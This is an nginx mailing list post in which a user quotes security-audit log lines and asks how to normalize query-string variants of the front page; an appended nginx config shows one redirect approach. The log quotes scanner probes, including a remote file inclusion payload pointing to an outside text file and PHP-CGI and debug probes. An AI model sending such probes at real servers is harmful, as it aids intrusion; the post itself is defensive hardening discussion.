canonicalization of $uri with "/?.*" content

173279834462 nginx-forum at nginx.us
Thu Apr 16 14:13:33 UTC 2015


The last security audit revealed the following: 

V:Wed Apr 15 20:58:19 2015 - 200 for GET: /?mod=node&nid=some_thing&op=view
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?Open
V:Wed Apr 15 20:58:43 2015 - 200 for GET: /?OpenServer
V:Wed Apr 15 20:59:16 2015 - 200 for GET: /?sql_debug=1
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:40 2015 - 200 for GET: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?PageServices
V:Wed Apr 15 20:59:43 2015 - 200 for GET: /?wp-cs-dump
V:Wed Apr 15 21:03:06 2015 - 200 for GET: /?D=A
V:Wed Apr 15 21:04:58 2015 - 200 for GET: /?_CONFIG[files][functions_page]=http://example.com/rfiinc.txt?
V:Wed Apr 15 21:08:00 2015 - 200 for GET: /?-s
V:Wed Apr 15 21:08:09 2015 - 200 for GET: /?q[]=x
V:Wed Apr 15 21:08:41 2015 - 200 for GET: /?sc_mode=edit
V:Wed Apr 15 21:09:30 2015 - 200 for GET: /?admin

In plain words, there are infinitely many $request_uri values that return the
content of the canonical address.

You can test your own domain "example.com":

canonical:
http://example.com/

unwanted variants:
http://example.com/?mod=node&nid=some_thing&op=view
http://example.com/?Open
http://example.com/?OpenServer
...

Is there an nginx parameter to normalize this type of $uri?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,258101,258101#msg-258101
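One way to force the canonical form for a page that takes no parameters, as an added example that is not from the original post or its replies. It assumes a static front page at / that never needs a query string, and a hypothetical /app/ path that legitimately does, so the rule is scoped to the one location rather than applied site-wide:

```nginx
# Added illustration, not configuration from the original thread.
server {
    listen 80;
    server_name example.com;
    root /var/www/example.com;   # assumed document root
    index index.html;

    # The front page takes no parameters, so every "/?..." request is an
    # unwanted variant. $is_args is "?" when a query string is present and
    # empty otherwise; "return 301 /" answers with a Location that omits the
    # query string, which is what normalizes the URL.
    location = / {
        if ($is_args) {
            return 301 /;
        }
    }

    # Default handler for the rest of the static content.
    location / {
        try_files $uri =404;
    }

    # Paths that genuinely use query parameters are left untouched; applying
    # the redirect there would break the application.
    location /app/ {
        proxy_pass http://127.0.0.1:8080;   # assumed backend
    }
}
```

After a reload, each of the scanner's "/?..." variants above receives a 301 to http://example.com/ instead of a 200 with the front page content, so the canonical page is served from exactly one URL.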



More information about the nginx mailing list